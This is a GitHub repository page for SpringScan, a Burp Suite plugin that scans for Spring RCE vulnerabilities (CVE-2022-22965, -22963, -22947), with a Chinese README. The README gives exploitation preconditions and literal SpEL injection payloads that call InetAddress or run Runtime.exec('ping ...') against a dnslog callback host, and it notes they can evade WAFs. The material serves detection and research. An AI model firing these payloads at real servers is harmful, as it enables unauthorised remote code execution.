Skip to content

metaStor/SpringScan

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
imgs
imgs
 
 
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

SpringScan Burp 检测插件

支持检测漏洞

  • Spring Core RCE (CVE-2022-22965)
  • Spring Cloud Function SpEL RCE (CVE-2022-22963)
  • Spring Cloud GateWay SPEL RCE (CVE-2022-22947)

回连平台

  • Dnglog
  • BurpCollaboratorClient
  • Ceye
  • 支持自定义回连平台

CVE-2022-22965 检测方法

利用条件

  • JDK9及其以上版本;

  • 使⽤了Spring-beans包;

  • 使⽤了Spring参数绑定,参数绑定使⽤的是⾮基本参数类型,如POJO ;

  • 使用Tomcat部署,且日志记录功能开启(默认开启)

无损检测,主要通过下面两种方式检测:

  • 报错检测
  • 回连检测(Dnglos/BurpCollaboratorClient/Ceye)

检测置信度:

回连检测 > 报错检测

报错检测误报率较大,可能存在漏洞但不能保证JDK版本大于等于9,可以及时捕捉到不出网的漏洞;回连检测准确率高,不适用于不出网环境。

CVE-2022-22963 检测方法

利用条件

  • 默认路由/functionRouter存在SpEL表达式注入

两种检测方法:

  • 通过Java自带InetAddres库spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("xxx.dnslog.cn")回连探测(可绕过WAF拦截命令执行)
  • 通过执行ping命令spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping xxx.dnslog.cn")回连探测

编译

如需编译其他JDK版本,可参考如下方法编译jar包:

image-20220409120135726

image-20220409120218010

image-20220409120315324

image-20220409120455863

截图

加载插件成功

image-20220409120649662

漏洞检测情况

image-20220409121152524

image-20220409124509160

插件设置,默认检测方法全开,回连平台默认Dnslog

image-20220409120720309

target 模块中可以看到漏洞详情

image-20220409124402852

免责声明

本工具仅作为安全研究交流,请勿用于非法用途。如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,本人将不承担任何法律及连带责任。

About

SpringScan 漏洞检测 Burp插件

Resources

Readme

License

MIT license
Activity

Stars

605 stars

Watchers

9 watching

Forks

48 forks
Report repository

Releases 11

SpringScan V1.8.2 Latest
Nov 13, 2023
+ 10 releases

Packages

No packages published

Languages